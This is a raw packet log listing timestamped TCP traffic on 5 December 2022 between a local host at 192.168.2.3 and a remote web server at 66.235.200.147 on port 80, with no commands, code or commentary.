Dec 5, 2022 01:32:37.628504038 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.628554106 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.628990889 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.629049063 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.629101992 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.629153013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.629158020 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.629199028 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.629203081 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.630116940 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.630182981 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.630234003 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.630251884 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.630279064 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.630284071 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.630336046 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.630779028 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.630835056 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.630837917 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.630892038 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.630906105 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.630959034 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.631007910 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.631058931 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.631688118 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.631742001 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.631793022 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.631817102 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.631839037 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.631843090 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.631896973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.632652044 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.632708073 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.632738113 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.632760048 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.632760048 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.632810116 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.632859945 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.632913113 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.642038107 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.642098904 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.642149925 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.642200947 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.642249107 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.642981052 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.643035889 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.643075943 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.643089056 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.643140078 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.643193960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.643202066 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.643245935 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.643277884 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.643296957 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.643345118 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.643347979 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.644745111 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.644800901 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.644850969 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.644869089 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.644901037 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.644903898 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.644952059 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.645003080 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.645052910 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.645054102 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.645107985 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.645109892 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.645149946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.645205975 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.646073103 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.646136045 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.646188021 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.646250963 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.646260977 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.646303892 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.646306038 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.646356106 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.646405935 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.646457911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.646460056 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.646508932 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.647840977 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.647902966 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.647958040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.648014069 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.648030043 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.648067951 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.648068905 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.648128033 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.648185015 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.648241043 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.648245096 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.648303032 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.649693966 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.649753094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.649810076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.649823904 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.649866104 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.649919987 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.649975061 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.649977922 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.650029898 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.650093079 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.650099993 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.650142908 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.650151968 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.650298119 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.650353909 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.650408983 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.650410891 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.650454998 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.650465012 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.650520086 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.650567055 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.650576115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.650629997 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.650680065 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.650685072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.651272058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.651334047 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.651359081 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.651387930 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.651443005 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.651492119 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.651498079 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.651551962 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.651602983 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.651607037 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.651662111 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.651712894 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.652179003 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.652237892 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.652252913 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.652293921 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.652352095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.652405977 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.652410984 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.652451038 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.652461052 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.652517080 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.652571917 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.652636051 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.653163910 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.653265953 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.653326035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.653347969 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.653376102 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.653383017 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.653440952 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.653516054 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.653573990 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.653580904 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.653623104 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.653629065 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.653685093 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.654244900 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.654324055 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.654324055 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.654377937 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.654438972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.654498100 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.654552937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.654608965 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.654611111 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.654655933 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.654664040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.654717922 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.655221939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.655281067 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.655303001 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.655338049 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.655339956 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.655394077 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.655447960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.655503035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.655504942 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.655550957 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.655558109 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.655613899 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.656155109 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.656235933 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.656305075 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.656362057 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.656363010 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.656416893 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.656471968 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.656524897 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.656527042 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.656579018 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.656584978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.656641960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.656697989 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.656757116 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.657413960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.657474995 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.657531023 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.657546997 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.657581091 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.657588005 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.657655001 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.657691002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.657701015 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.657728910 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.657766104 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.657819033 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.658205032 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.658245087 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.658276081 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.658282995 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.658319950 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.658354998 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.658368111 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.658391953 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.658396959 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.658428907 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.658463955 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.658514023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.659143925 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.659219980 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.663522005 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.663559914 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.663598061 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.663633108 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.663667917 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.663675070 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.663701057 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.663707972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.663743019 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.663754940 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.663779020 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.663928032 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.663955927 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.664025068 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.664062023 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.664098024 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.664108992 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.664134026 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.664145947 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.664170027 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.664205074 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.664241076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.664252043 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.664285898 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.664943933 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.664983988 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.665019035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.665055037 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.665077925 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.665091991 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.665098906 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.665128946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.665163040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.665195942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.665210009 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.665249109 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.665805101 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.665842056 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.665878057 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.665915012 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.665932894 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.665950060 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.665954113 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.665987968 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.666023016 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.666059017 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.666066885 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.666100979 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.666783094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.666821003 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.666858912 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.666913033 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.666929007 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.666949034 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.666964054 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.666985035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.667021990 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.667057037 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.667064905 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.667102098 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.667732954 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.667777061 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.667817116 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.667859077 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.667880058 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.667901039 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.667915106 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.667939901 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.667979002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.668018103 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.668024063 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.668061972 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.668682098 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.668724060 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.668766022 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.668802023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.668809891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.668855906 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.668879986 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.668895006 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.668935061 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.668971062 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.668973923 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.669023037 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.669581890 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.669626951 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.669668913 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.669698000 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.669709921 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.669753075 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.669792891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.669802904 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.669832945 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.669856071 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.669874907 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.670586109 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.670629978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.670664072 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.670672894 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.670684099 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.670713902 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.670753956 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.670794964 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.670805931 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.670833111 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.670835972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.670888901 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.670934916 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.670981884 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.671557903 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.671602011 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.671626091 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.671643019 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.671684027 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.671724081 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.671732903 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.671765089 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.671766043 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.671804905 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.671844959 CET	80	49705	66.235.200.147	192.168.2.3
